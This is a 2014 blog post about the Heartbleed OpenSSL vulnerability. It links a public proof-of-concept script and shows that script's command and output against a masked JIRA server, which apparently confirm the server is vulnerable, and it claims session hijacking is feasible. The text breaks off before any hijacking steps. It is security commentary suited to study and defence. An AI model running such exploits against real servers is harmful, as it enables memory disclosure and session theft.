Posted by Cyber Wizard on 04/14/2014 01:26:35
The Heartbleed issue is actually worse than it might immediately seem (and it seems pretty bad already).
In case youíve been out of the loop, Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL that allows any remote user to dump some of the contents of the serverís memory. And yes, thatís really bad. The major concern is that a skilled user could craft an exploit that could dump the RSA private key that the server is using to communicate with its clients. The level of knowledge / skill required to craft this attack isnít particularly high, but likely out of reach for the average script kiddie user.
So why is Heartbleed worse than you think? Itís simple: the currently-available proof-of-concept scripts allow any client, anywhere in the world, to perform a session hijacking attack of a logged in user.
As of this morning, the most widely-shared proof-of-concept is this simple Python script: https://gist.github.com/takeshixx/10107280.
With this script, anyone in the world can dump a bit of RAM from a vulnerable server.
Letís have a look at the output of this utility against a vulnerable server running the JIRA ticket tracking system. The hex output has been removed to improve readability.
[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3239
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
(lots of garbage)
WARNING: server returned more data than it should - server is vulnerable!